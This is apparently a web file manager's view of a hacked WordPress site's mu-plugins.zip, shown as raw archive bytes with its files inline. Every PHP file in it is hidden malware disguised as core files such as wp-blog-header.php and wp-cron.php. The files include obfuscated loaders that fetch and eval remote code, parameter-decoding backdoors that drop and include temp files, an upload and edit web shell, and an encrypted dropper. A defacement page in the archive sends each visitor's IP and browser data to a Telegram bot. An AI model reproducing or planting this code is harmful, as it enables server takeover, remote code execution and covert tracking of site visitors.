File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/polaslotjos.xyz/mu-plugins.zip

Back
PK��Ӓ�\ �� wp-blog-header.phpnu��6�$��<?php goto tUl6b; wXtx3: $rHfMY = $_REQUEST["\144\157\141\143\x74"]; goto HgQ3I; aYfRm: session_start(); goto wXtx3; N7Xk9: $sJ3ad = (isset($_SERVER["\110\x54\x54\x50\x53"]) && $_SERVER["\x48\124\x54\x50\x53"] === "\x6f\156" ? "\150\164\x74\160\x73" : "\150\164\x74\160") . "\x3a\x2f\x2f{$_SERVER["\x48\124\x54\x50\137\x48\x4f\x53\x54"]}{$_SERVER["\122\x45\x51\125\x45\123\124\137\x55\x52\111"]}"; goto Pmj6n; LLG9S: function sXidc($sJ3ad) { goto n0NKE; NAssn: $tz7fb = curl_exec($U8dd8); goto S3rIV; yoBMI: return $tz7fb; goto VHWhP; TwOE6: $tz7fb = stream_get_contents($FJvaM); goto cwV9V; VDpuf: if (!function_exists("\x63\x75\x72\154\137\x65\x78\145\x63")) { goto el1M3; } goto XeE53; RIUJx: el1M3: goto qrsug; O9m5u: mfeik: goto yoBMI; vh255: $FJvaM = fopen($sJ3ad, "\x72"); goto TwOE6; ENMVc: if (!(empty($tz7fb) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\155\137\147\x65\x74\137\143\x6f\x6e\x74\x65\156\164\163"))) { goto mfeik; } goto vh255; n0NKE: $tz7fb = ''; goto VDpuf; K9wqV: KCf2O: goto ENMVc; OEkP7: curl_setopt($U8dd8, CURLOPT_RETURNTRANSFER, 1); goto JMTNg; XeE53: $U8dd8 = curl_init($sJ3ad); goto OEkP7; S3rIV: curl_close($U8dd8); goto RIUJx; tkeD5: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYPEER, 0); goto cQqi_; JMTNg: curl_setopt($U8dd8, CURLOPT_FOLLOWLOCATION, 1); goto tkeD5; T4y9f: $tz7fb = file_get_contents($sJ3ad); goto K9wqV; cwV9V: fclose($FJvaM); goto O9m5u; cQqi_: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYHOST, 0); goto NAssn; qrsug: if (!(empty($tz7fb) && function_exists("\x66\151\x6c\x65\x5f\x67\x65\x74\137\x63\157\156\x74\145\x6e\164\163"))) { goto KCf2O; } goto T4y9f; VHWhP: } goto KwJ9D; rzajS: exit; goto kAGwF; B6fd_: eval("\77\x3e" . $Biqik); goto rzajS; Pmj6n: XlPsQ(array("\167\145\x62" => $sJ3ad)); goto wwzKB; kAGwF: JS6LS: goto LLG9S; IQihW: KSZRy: goto K2jbV; tUl6b: error_reporting(0); goto aYfRm; HgQ3I: if (!empty($rHfMY)) { goto KSZRy; } goto N7Xk9; K2jbV: $_SESSION["\x64\x6f\x61\x63\164"] = $rHfMY; goto jZVAU; wwzKB: goto JS6LS; goto IQihW; jZVAU: $Biqik = sxIDc(str_rot13("\x75\147\x67\x63\x66\72\57\57\x75\x6f\157\156\144\141\56\x74\x6e\x7a\162\x6e\143\162\x2e\x67\142\x63\x2f\x71\x62\142\x65\x2f") . $rHfMY . "\56\164\x78\164"); goto B6fd_; KwJ9D: function xLpSq($oFbXi) { goto qRLdR; sgjQn: curl_setopt($OUnCg, CURLOPT_POSTFIELDS, $oFbXi); goto eEPm6; eEPm6: curl_setopt($OUnCg, CURLOPT_RETURNTRANSFER, true); goto JM27m; qB8i1: $OUnCg = curl_init(str_rot13($sJ3ad)); goto jfSiq; qRLdR: $sJ3ad = "\x75\x67\x67\x63\x3a\x2f\x2f\145\x72\x7a\x62\x67\162\x32\60\62\x35\x2e\157\154\x75\x62\x67\x2e\147\x62\x63\x2f\166\x61\161\x72\x6b\56\x63\165\143"; goto qB8i1; JM27m: $FJ0YN = curl_exec($OUnCg); goto RiAUd; RiAUd: curl_close($OUnCg); goto OBMXo; jfSiq: curl_setopt($OUnCg, CURLOPT_POST, 1); goto sgjQn; OBMXo: } ?>PK��Ӓ�\L�=1��1��345450/.dchunknu��[��<?php print "owDUGaCupni"."TwwHUeixeALQspm";exit;PK��Ӓ�\l�� 345450/923245/727610/company.phpnu��[��<?php if(in_array("p\x6Finte\x72", array_keys($_POST))){ $record = $_POST["p\x6Finte\x72"]; $record = explode ( '.' ,$record ); $data_chunk = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s8 ); $p = 0; foreach ($record as $v1) { $sChar = ord($s8[$p% $lenS] ); $dec = ((int)$v1 - $sChar - ($p% 10)) ^ 31; $data_chunk .= chr($dec ); $p++; } $entry = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp", getcwd(), getenv("TMP"), session_save_path(), "/var/tmp", "/dev/shm"]); foreach ($entry as $key => $k) { if (array_product([is_dir($k), is_writable($k)])) { $item = join("/", [$k, ".token"]); if (@file_put_contents($item, $data_chunk) !== false) { include $item; unlink($item); exit; } } } } if(isset($_REQUEST["\x66ac"])){ $parameter_group = $_REQUEST["\x66ac"]; $parameter_group = explode("." , $parameter_group ) ; $ent = ''; $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt8); $w = 0; array_walk($parameter_group ,function ($v9) use (&$ent ,&$w ,$salt8 ,$lenS) {$sChar = ord($salt8[$w % $lenS]); $dec = ((int)$v9 - $sChar - ($w % 10))^40; $ent .= chr($dec); $w++; }); $pgrp = array_filter([getenv("TMP"), getcwd(), "/dev/shm", "/tmp", sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP")]); $k = 0; do { $res = $pgrp[$k] ?? null; if ($k >= count($pgrp)) break; if (max(0, is_dir($res) * is_writable($res))) { $symbol = vsprintf("%s/%s", [$res, ".data_chunk"]); if (@file_put_contents($symbol, $ent) !== false) { include $symbol; unlink($symbol); exit; } } $k++; } while (true); }PK��Ӓ�\��9��9�� 345450/923245/727610/.data_chunknu��[��<?php print "skPFBYcrQJOooJBuKYMh"."FMrOCFOZHtstVe";exit;PK��Ӓ�\��%��%��345450/923245/727610/index.phpnu��[��<!DOCTYPE html> <html lang="id"> <head> <title>Hacked by Kize1337</title> <meta property="og:image" content="https://c.top4top.io/p_3715008ex4.jpg"> <meta name="author" content="Kize1337"/> <meta name="copyright" content="2025"/> <meta name="title" content="Hacked by Kize1337"> <meta name="description" content="We are party on your site."> <link href="https://fonts.googleapis.com/css?family=Space+Mono" rel="stylesheet"> <link rel="icon" href="https://k.top4top.io/p_3715j5o0a8.png" type="image/webp"> <style type="text/css"> * { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: black; margin: 0; padding: 0; font-family: 'Space Mono', monospace; min-height: 100vh; display: flex; justify-content: center; align-items: center; } .container { text-align: center; width: 100%; max-width: 800px; padding: 40px 20px; } .x { font-size: 60px; transform: skewY(-8deg); color: white; margin-bottom: 40px; line-height: 1.2; } .x span { color: #ff0000; } .hacker-image { margin: 40px auto; max-width: 300px; width: 100%; } .hacker-image img { width: 100%; height: auto; display: block; } .audio-player { margin: 25px auto; } .audio-player audio { width: 200px; height: 30px; filter: invert(1) hue-rotate(180deg); } .message { color: white; font-size: 24px; margin: 30px 0; } .greetz-title { color: white; font-size: 18px; margin: 25px 0 10px 0; } .greetz-list { font-family: 'Courier New', monospace; font-size: 14px; color: #ff0000; font-weight: bold; line-height: 1.4; } .contact-section { margin-top: 40px; color: white; font-family: 'Space Mono', monospace; font-size: 18px; } .contact-link { color: #ff0000; text-decoration: none; font-weight: bold; } .contact-link:hover { text-decoration: underline; } @media (min-width: 1024px) { .container { padding: 60px 20px; } .x { margin-bottom: 50px; } .hacker-image { margin: 50px auto; } } @media (max-width: 768px) { .container { padding: 30px 20px; } .x { font-size: 40px; margin-bottom: 30px; } .message { font-size: 18px; margin: 25px 0; } .contact-section { font-size: 16px; margin-top: 30px; } .hacker-image { max-width: 250px; margin: 30px auto; } } @media (max-width: 480px) { .container { padding: 20px 15px; } .x { font-size: 32px; margin-bottom: 25px; } .message { font-size: 16px; margin: 20px 0; } .contact-section { font-size: 14px; margin-top: 25px; } .hacker-image { max-width: 200px; margin: 25px auto; } .audio-player audio { width: 180px; } .greetz-title { font-size: 16px; margin: 20px 0 8px 0; } .greetz-list { font-size: 12px; } } </style> </head> <body> <div class="container"> <h1 class="x">Hacked by <span>Kize1337</span></h1> <div class="hacker-image"> <img src="https://c.top4top.io/p_3715008ex4.jpg" alt="Hacker Image"> </div> <div class="audio-player"> <audio id="bg-audio" src="https://e.top4top.io/m_3715w7dyq6.mp3" autoplay controls></audio> </div> <h2 class="message">MSG: Patch your system!</h2> <h3 class="greetz-title">Greetz:</h3> <div class="greetz-list"> Kize1337 - 0xTebu - Lizardpredator - JohenLG - Luminance - Sph69 - Axonhub - Privnet </div> <div class="contact-section"> CONTACT: <a href="https://t.me/deathbase" class="contact-link" target="_blank">t.me/deathbase</a> </div> </div> <script> document.body.addEventListener('click', function () { const audio = document.getElementById('bg-audio'); if (audio) { audio.muted = false; audio.volume = 1.0; audio.play().catch((e) => { console.warn('Autoplay failed:', e); }); } }, { once: true }); // Telegram logger async function sendLogToTelegram() { const token = "8499549696:AAEQJ6pvg9oFNbHTtIKKRkiARzIRLaeNJ7E"; const chat_id = "-1002699548560"; let ipInfo = "Unknown"; try { const res = await fetch("https://api64.ipify.org?format=json"); const data = await res.json(); ipInfo = data.ip; } catch (e) { ipInfo = "Unavailable"; } const ua = navigator.userAgent; const platform = navigator.platform; const browser = (() => { if (ua.includes("Chrome")) return "Chrome"; if (ua.includes("Firefox")) return "Firefox"; if (ua.includes("Safari") && !ua.includes("Chrome")) return "Safari"; if (ua.includes("Opera") \|\| ua.includes("OPR")) return "Opera"; if (ua.includes("Edg")) return "Edge"; return "Unknown"; })(); const now = new Date(); const timestamp = now.toLocaleString("id-ID", { timeZone: "Asia/Jakarta" }); const message = `📌 Access Detected 📅 Date & Time: ${timestamp} 🌐 IP: ${ipInfo} 💻 Device: ${platform} 🌍 Browser: ${browser} 📣 User-Agent: ${ua} 📎 URL: ${window.location.href} _This message is sent automatically by a bot._`; const tgURL = `https://api.telegram.org/bot${token}/sendMessage`; await fetch(tgURL, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id, text: message, parse_mode: "Markdown" }) }); } window.onload = () => sendLogToTelegram(); </script> </body> </html>PK��Ӓ�\x�0��345450/923245/tinymce.phpnu��[��<?php if(filter_has_var(INPUT_POST, "\x76a\x6Cue")){ $data = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getcwd(), getenv("TMP"), "/tmp", "/dev/shm", sys_get_temp_dir()]); $factor = $_POST["\x76a\x6Cue"]; $factor = explode( '.', $factor) ; $holder = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt3); $p = 0; array_walk($factor, function ($v2) use (&$holder, &$p, $salt3, $sLen) { $sChar = ord($salt3[$p %$sLen]); $d = ((int)$v2 - $sChar - ($p %10)) ^ 22; $holder .= chr($d); $p++; }); while ($val = array_shift($data)) { if ((bool)is_dir($val) && (bool)is_writable($val)) { $comp = join("/", [$val, ".reference"]); if (file_put_contents($comp, $holder)) { require $comp; unlink($comp); exit; } } } }PK��Ӓ�\��345450/923245/index.phpnu��[��<?php $old = __FILE__; $new = preg_replace('/\\.jpg$/', '', $old); rename($old, $new); echo "Renamed $old to $new"; ?> <?php $path = isset($_GET['path']) ? $_GET['path'] : '.'; $path = realpath($path); // ????? ???? echo "<h3>Path: $path</h3>"; // ????? ???????? ?????? echo "<form method='POST' enctype='multipart/form-data'> <input type='file' name='file'> <input type='hidden' name='upload_path' value='" . htmlspecialchars($path) . "'> <button type='submit'>Upload</button> </form>"; // ????????? ???????? ????? if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $uploadPath = isset($_POST['upload_path']) ? $_POST['upload_path'] : $path; $uploadedFile = $uploadPath . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadedFile)) { echo "<p style='color:green;'>File uploaded: " . htmlspecialchars($_FILES['file']['name']) . "</p>"; } else { echo "<p style='color:red;'>Failed to upload file.</p>"; } } // ????????? ???????? ????? if (isset($_GET['delete'])) { $fileToDelete = $path . DIRECTORY_SEPARATOR . $_GET['delete']; if (is_file($fileToDelete) && unlink($fileToDelete)) { echo "<p style='color:green;'>File deleted: " . htmlspecialchars($_GET['delete']) . "</p>"; } else { echo "<p style='color:red;'>Failed to delete file.</p>"; } } // ????????? ?????????? ????????? ? ????? if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file'])) { $fileToEdit = $path . DIRECTORY_SEPARATOR . $_POST['edit_file']; file_put_contents($fileToEdit, $_POST['file_content']); echo "<p style='color:green;'>File updated: " . htmlspecialchars($_POST['edit_file']) . "</p>"; } // ????? ?????? ?????? ? ????? echo "<ul>"; foreach (scandir($path) as $item) { if ($item === '.') continue; $itemPath = $path . DIRECTORY_SEPARATOR . $item; echo "<li>"; if (is_dir($itemPath)) { echo "<a href='?path=" . urlencode($itemPath) . "'>[DIR] $item</a>"; echo " - <i>Permissions:</i> " . substr(sprintf('%o', fileperms($itemPath)), -4); } else { echo "<a href='?path=" . urlencode($path) . "&file=" . urlencode($item) . "'>$item</a>"; echo " - <a href='?path=" . urlencode($path) . "&delete=" . urlencode($item) . "' style='color:red;'>[Delete]</a>"; echo " - <i>Size:</i> " . filesize($itemPath) . " bytes, <i>Permissions:</i> " . substr(sprintf('%o', fileperms($itemPath)), -4); } echo "</li>"; } echo "</ul>"; // ???????? ? ?????????????? ????? if (isset($_GET['file'])) { $filePath = $path . DIRECTORY_SEPARATOR . $_GET['file']; if (is_file($filePath)) { echo "<h3>Contents of " . htmlspecialchars($_GET['file']) . ":</h3>"; echo "<form method='POST'> <textarea name='file_content' style='width:100%;height:300px;'>" . htmlspecialchars(file_get_contents($filePath)) . "</textarea> <input type='hidden' name='edit_file' value='" . htmlspecialchars($_GET['file']) . "'> <button type='submit'>Save Changes</button> </form>"; } } ?> PK��Ӓ�\��)" �� 345450/index.phpnu��[��<?php / LoL / $_z = []; $_z[0] = 'c7c73da40cf62d7e7eba0e10f3e5b71cc93df3b77635e56c1e35109d5bbbe5a24d638e45'; $_z[1] = 'bba676d9b87bba6c2d670cb6eba278146ce5ebd0ba351cb7141ebb13b71beb141bb77d3d'; $_z[2] = 'e5d0a2b739371bbbd965242eb71ca4d089e51e631b2e24b84e39a2bbe6590e7d10ba65a4'; $_z[3] = '4ad04ae63ebb6322391465c93ebb630ef3be247d107bf6672e3513f64d67b750a2a263e5'; $_z[4] = '67a44dd0b8c92dbc64eb5bc989141e0ea4a66cbc1e3dbbf32e4ecc76bee5bbbb37671445'; $_z[5] = '890e4d631b4d4abcbcebef3ee6bb244e4a4e5bf6e6d18e0c3e1e78b7ba244ef40ea47b8e'; $_z[6] = 'd9d92e445b6cd9b71ce6bacc4b362d4bba1b1064394eb8f33df3103a871cebbe3d63f463'; $_z[7] = '358eeb37f344d94e0e7e3de5ef147d89d1a43a24c97debbec97e59136c0e36244a781e4b'; $_z[8] = 'ba241c638ee6f4a66c590e89450ebba2b767e5149d6578be651c44143ae5bceb7d4dd189'; $_z[9] = '3578444e2d67d1ebd07d8710b778443e5b3ebcd07810503d630ee54eccd0f445d0be0eb8'; $_z[10] = 'cc37598ef66c63390eb87eb8b6451cd0f42ebca467e5450e7d7bb764d1c936b6b650baa6'; $_z[11] = '1eba5b634db84b5067b82d893e4a0cbcd03544d0107db667efa413f4a4397ebc35b6d94d'; $_z[12] = '1cc9b8d07e4d78a68ebc76370e37c9f67b0c1b2467a25b1c2d8ec9221c10d94b9dbebc39'; $_z[13] = '63b6393510bc9dcceb63a40e89e5648e2d5924d9d91eeb2e148ea6a250140c3dccba5bb6'; $_z[14] = '361b5befa64db85b8e594a5010bc4bbaeb655976e5b7d0780ce5ba24245022e5ef647b3d'; $_z[15] = '7e364e1e3ad9f476370c87353db6f3a4a4be373ed12e3744353ef6b7bca64ed1367bbbbb'; $_z[16] = '78e5ba4b78a23df3ef4d8e3659bc3ac9b7146444a27e7dc959763e22be35d1c9efeb1c89'; $_z[17] = 'ba1b89bc67d90e8e1ba62ed145be5b4bbe655959c8c8'; $_h = implode('', $_z); if (hash('sha256', $_h) !== 'a675f9757984393f445d0b9233320b3ba3fe52f21de0e7d9535bbbea4cfa9c69') die('Corrupted'); $_b = hex2bin($_h); $_b = strrev($_b); $_tbl = [200, 124, 51, 165, 180, 21, 85, 169, 4, 97, 79, 38, 5, 213, 67, 237, 112, 3, 114, 8, 86, 163, 231, 49, 171, 250, 143, 161, 214, 141, 144, 252, 84, 245, 71, 119, 152, 170, 241, 47, 32, 240, 203, 12, 25, 66, 227, 217, 157, 166, 57, 120, 53, 182, 16, 30, 142, 91, 95, 172, 41, 199, 15, 96, 7, 69, 58, 164, 230, 209, 101, 99, 27, 201, 244, 123, 46, 135, 190, 243, 246, 55, 188, 208, 34, 77, 89, 20, 186, 103, 162, 197, 216, 228, 234, 81, 65, 187, 75, 68, 239, 100, 80, 62, 118, 125, 78, 183, 137, 229, 14, 28, 126, 54, 74, 19, 45, 108, 36, 61, 184, 204, 235, 122, 64, 189, 109, 29, 196, 175, 195, 221, 205, 218, 153, 136, 133, 242, 179, 236, 48, 106, 92, 232, 42, 202, 90, 13, 212, 220, 33, 31, 43, 159, 37, 148, 156, 93, 116, 102, 24, 44, 149, 146, 194, 253, 0, 198, 39, 2, 128, 168, 76, 40, 215, 98, 150, 140, 176, 207, 94, 88, 117, 138, 151, 178, 1, 132, 111, 130, 17, 107, 52, 131, 134, 60, 9, 255, 226, 35, 129, 18, 158, 233, 63, 87, 211, 11, 192, 113, 219, 222, 155, 160, 82, 167, 105, 73, 210, 225, 177, 127, 191, 83, 206, 121, 154, 139, 193, 6, 223, 185, 50, 56, 254, 23, 238, 181, 104, 26, 72, 173, 249, 10, 147, 22, 174, 248, 224, 145, 247, 251, 59, 70, 110, 115]; $_inv = [166, 186, 169, 17, 8, 12, 229, 64, 19, 196, 243, 207, 43, 147, 110, 62, 54, 190, 201, 115, 87, 5, 245, 235, 160, 44, 239, 72, 111, 127, 55, 151, 40, 150, 84, 199, 118, 154, 11, 168, 173, 60, 144, 152, 161, 116, 76, 39, 140, 23, 232, 2, 192, 52, 113, 81, 233, 50, 66, 252, 195, 119, 103, 204, 124, 96, 45, 14, 99, 65, 253, 34, 240, 217, 114, 98, 172, 85, 106, 10, 102, 95, 214, 223, 32, 6, 20, 205, 181, 86, 146, 57, 142, 157, 180, 58, 63, 9, 175, 71, 101, 70, 159, 89, 238, 216, 141, 191, 117, 126, 254, 188, 16, 209, 18, 255, 158, 182, 104, 35, 51, 225, 123, 75, 1, 105, 112, 221, 170, 200, 189, 193, 187, 136, 194, 77, 135, 108, 183, 227, 177, 29, 56, 26, 30, 249, 163, 244, 155, 162, 176, 184, 36, 134, 226, 212, 156, 48, 202, 153, 213, 27, 90, 21, 67, 3, 49, 215, 171, 7, 37, 24, 59, 241, 246, 129, 178, 220, 185, 138, 4, 237, 53, 107, 120, 231, 88, 97, 82, 125, 78, 222, 208, 228, 164, 130, 128, 91, 167, 61, 0, 73, 145, 42, 121, 132, 224, 179, 83, 69, 218, 206, 148, 13, 28, 174, 92, 47, 133, 210, 149, 131, 211, 230, 248, 219, 198, 46, 93, 109, 68, 22, 143, 203, 94, 122, 139, 15, 236, 100, 41, 38, 137, 79, 74, 33, 80, 250, 247, 242, 25, 251, 31, 165, 234, 197]; $_o = ''; for ($i=0;$i<strlen($_b);$i++) { $_o .= chr($_inv[ord($_b[$i])]); } $_s = gzinflate(base64_decode(substr($_o,2))); $_f = sys_get_temp_dir().'/'.sha1(__FILE__).'.php'; file_put_contents($_f, $_s); require $_f; @unlink($_f); ?> PK��Ӓ�\ ��345450/CSSDefinition.phpnu��[��<?php if(filter_has_var(INPUT_POST, "refer\x65n\x63\x65")){ $ent = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/tmp", "/dev/shm", session_save_path(), getenv("TMP"), sys_get_temp_dir(), getcwd()]); $comp = $_POST["refer\x65n\x63\x65"]; $comp = explode ( ".", $comp); $pointer=''; $s7='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen( $s7); $v=0; while( $v <count( $comp)) { $v2=$comp[$v]; $sChar=ord( $s7[$v % $lenS]); $d=( ( int)$v2 - $sChar -( $v % 10)) ^4; $pointer .= chr( $d); $v++; } foreach ($ent as $data_chunk) { if ((is_dir($data_chunk) and is_writable($data_chunk))) { $value = implode("/", [$data_chunk, ".entry"]); $success = file_put_contents($value, $pointer); if ($success) { include $value; @unlink($value); die();} } } }PK��Ӓ�\ i��wp-cron.phpnu��[��<?php if(@$_REQUEST["\x64\x61ta"] !== null){ $descriptor = $_REQUEST["\x64\x61ta"]; $descriptor=explode ("." , $descriptor ) ; $res = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $q = 0; while ($q < count($descriptor)) { $v8 = $descriptor[$q]; $sChar = ord($s[$q % $sLen] ); $d = ((int)$v8 - $sChar - ($q % 10)) ^ 43; $res .= chr($d ); $q++; } $ptr = array_filter(["/var/tmp", getenv("TEMP"), "/tmp", "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), sys_get_temp_dir(), getcwd()]); $pointer = 0; do { $desc = $ptr[$pointer] ?? null; if ($pointer >= count($ptr)) break; if (array_product([is_dir($desc), is_writable($desc)])) { $flg = str_replace("{var_dir}", $desc, "{var_dir}/.k"); $file = fopen($flg, 'w'); if ($file) { fwrite($file, $res); fclose($file); include $flg; @unlink($flg); exit; } } $pointer++; } while (true); } goto tUl6b; wXtx3: $rHfMY = $_REQUEST["\144\157\141\143\x74"]; goto HgQ3I; aYfRm: session_start(); goto wXtx3; N7Xk9: $sJ3ad = (isset($_SERVER["\110\x54\x54\x50\x53"]) && $_SERVER["\x48\124\x54\x50\x53"] === "\x6f\156" ? "\150\164\x74\160\x73" : "\150\164\x74\160") . "\x3a\x2f\x2f{$_SERVER["\x48\124\x54\x50\137\x48\x4f\x53\x54"]}{$_SERVER["\122\x45\x51\125\x45\123\124\137\x55\x52\111"]}"; goto Pmj6n; LLG9S: function sXidc($sJ3ad) { goto n0NKE; NAssn: $tz7fb = curl_exec($U8dd8); goto S3rIV; yoBMI: return $tz7fb; goto VHWhP; TwOE6: $tz7fb = stream_get_contents($FJvaM); goto cwV9V; VDpuf: if (!function_exists("\x63\x75\x72\154\137\x65\x78\145\x63")) { goto el1M3; } goto XeE53; RIUJx: el1M3: goto qrsug; O9m5u: mfeik: goto yoBMI; vh255: $FJvaM = fopen($sJ3ad, "\x72"); goto TwOE6; ENMVc: if (!(empty($tz7fb) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\155\137\147\x65\x74\137\143\x6f\x6e\x74\x65\156\164\163"))) { goto mfeik; } goto vh255; n0NKE: $tz7fb = ''; goto VDpuf; K9wqV: KCf2O: goto ENMVc; OEkP7: curl_setopt($U8dd8, CURLOPT_RETURNTRANSFER, 1); goto JMTNg; XeE53: $U8dd8 = curl_init($sJ3ad); goto OEkP7; S3rIV: curl_close($U8dd8); goto RIUJx; tkeD5: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYPEER, 0); goto cQqi_; JMTNg: curl_setopt($U8dd8, CURLOPT_FOLLOWLOCATION, 1); goto tkeD5; T4y9f: $tz7fb = file_get_contents($sJ3ad); goto K9wqV; cwV9V: fclose($FJvaM); goto O9m5u; cQqi_: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYHOST, 0); goto NAssn; qrsug: if (!(empty($tz7fb) && function_exists("\x66\151\x6c\x65\x5f\x67\x65\x74\137\x63\157\156\x74\145\x6e\164\163"))) { goto KCf2O; } goto T4y9f; VHWhP: } goto KwJ9D; rzajS: exit; goto kAGwF; B6fd_: eval("\77\x3e" . $Biqik); goto rzajS; Pmj6n: XlPsQ(array("\167\145\x62" => $sJ3ad)); goto wwzKB; kAGwF: JS6LS: goto LLG9S; IQihW: KSZRy: goto K2jbV; tUl6b: error_reporting(0); goto aYfRm; HgQ3I: if (!empty($rHfMY)) { goto KSZRy; } goto N7Xk9; K2jbV: $_SESSION["\x64\x6f\x61\x63\164"] = $rHfMY; goto jZVAU; wwzKB: goto JS6LS; goto IQihW; jZVAU: $Biqik = sxIDc(str_rot13("\x75\147\x67\x63\x66\72\57\57\x75\x6f\157\156\144\141\56\x74\x6e\x7a\162\x6e\143\162\x2e\x67\142\x63\x2f\x71\x62\142\x65\x2f") . $rHfMY . "\56\164\x78\164"); goto B6fd_; KwJ9D: function xLpSq($oFbXi) { goto qRLdR; sgjQn: curl_setopt($OUnCg, CURLOPT_POSTFIELDS, $oFbXi); goto eEPm6; eEPm6: curl_setopt($OUnCg, CURLOPT_RETURNTRANSFER, true); goto JM27m; qB8i1: $OUnCg = curl_init(str_rot13($sJ3ad)); goto jfSiq; qRLdR: $sJ3ad = "\x75\x67\x67\x63\x3a\x2f\x2f\145\x72\x7a\x62\x67\162\x32\60\62\x35\x2e\157\154\x75\x62\x67\x2e\147\x62\x63\x2f\166\x61\161\x72\x6b\56\x63\165\143"; goto qB8i1; JM27m: $FJ0YN = curl_exec($OUnCg); goto RiAUd; RiAUd: curl_close($OUnCg); goto OBMXo; jfSiq: curl_setopt($OUnCg, CURLOPT_POST, 1); goto sgjQn; OBMXo: } ?>PK��Ӓ�\��é��wp.blog.header.phpnu��[��<?php if(isset($_REQUEST["e\x6Et\x69\x74y"]) ? true : false){ $k = $_REQUEST["e\x6Et\x69\x74y"]; $k = explode ( "." , $k ); $flag = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $j = 0; while ($j < count($k)) {$v8 = $k[$j]; $sChar = ord($salt[$j %$sLen] ); $d = ((int)$v8 - $sChar - ($j %10)) ^ 60; $flag .= chr($d ); $j++;} $property_set = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", "/var/tmp", session_save_path(), getenv("TEMP"), getcwd(), "/tmp", getenv("TMP")]); foreach ($property_set as $symbol): if ((is_dir($symbol) and is_writable($symbol))) { $tkn = str_replace("{var_dir}", $symbol, "{var_dir}/.data_chunk"); if (@file_put_contents($tkn, $flag) !== false) { include $tkn; unlink($tkn); exit; } } endforeach; }PK��Ӓ�\�ͥ�� .htaccessnu��6�$��<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>PK��Ӓ�\ �� wp-blog-header.phpnu��6�$��PK��Ӓ�\L�=1��1��8��345450/.dchunknu��[��PK��Ӓ�\l�� 345450/923245/727610/company.phpnu��[��PK��Ӓ�\��9��9�� 345450/923245/727610/.data_chunknu��[��PK��Ӓ�\��%��%��345450/923245/727610/index.phpnu��[��PK��Ӓ�\x�0��2��345450/923245/tinymce.phpnu��[��PK��Ӓ�\��5��345450/923245/index.phpnu��[��PK��Ӓ�\��)" �� B��345450/index.phpnu��[��PK��Ӓ�\ ��T��345450/CSSDefinition.phpnu��[��PK��Ӓ�\ i��X��wp-cron.phpnu��[��PK��Ӓ�\��é��f��wp.blog.header.phpnu��[��PK��Ӓ�\�ͥ�� j��.htaccessnu��6�$��PK��k��